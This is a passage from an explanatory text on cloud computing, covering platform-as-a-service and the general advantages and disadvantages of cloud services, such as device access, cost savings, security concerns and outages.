cloud-based computing. PaaS shares some similarities with SaaS, the primary
difference being that instead of delivering software online, it is actually a platform for
creating software that is delivered via the Internet. This model includes platforms like
Salesforce.com and Heroku.4  5

Advantages of Cloud Computing 

Cloud-based software offers companies from all sectors a number of benefits, including the
ability to use software from any device either via a native app or a browser. As a result, users
can carry their files and settings over to other devices in a completely seamless manner.
Cloud computing is far more than just accessing files on multiple devices. Thanks to cloud
computing services, users can check their email on any computer and even store files using
services such as Dropbox and Google Drive. Cloud computing services also make it possible
for users to back up their music, files, and photos, ensuring those files are immediately
available in the event of a hard drive crash. It also offers big businesses huge cost-saving
potential. Before the cloud became a viable alternative, companies were required to purchase,
construct, and maintain costly information management technology and infrastructure.
Companies can swap costly server centers and IT departments for fast Internet connections,
where employees interact with the cloud online to complete their tasks.

The cloud structure allows individuals to save storage space on their desktops or laptops. It
also lets users upgrade software more quickly because software companies can offer their
products via the web rather than through more traditional, tangible methods involving discs
or flash drives. For example, Adobe customers can access applications in its Creative Cloud
through an Internet-based subscription. This allows users to download new versions and fixes
to their programs easily.

Disadvantages of the Cloud

With all of the speed, efficiencies, and innovations that come with cloud computing, there
are, naturally, risks.

Security has always been a big concern with the cloud especially when it comes to sensitive
medical records and financial information. While regulations force cloud computing services
to shore up their security and compliance measures, it remains an ongoing issue. Encryption
protects vital information, but if that encryption key is lost, the data disappears.
Servers maintained by cloud computing companies may fall victim to natural disasters,
internal bugs, and power outages, too. The geographical reach of cloud computing cuts both
ways: A blackout in California could paralyze users in New York, and a firm in Texas could
lose its data if something causes its Maine-based provider to crash.

As with any technology, there is a learning curve for both employees and managers. But with
many individuals accessing and manipulating information through a single portal, inadvertent
mistakes can transfer across an entire system.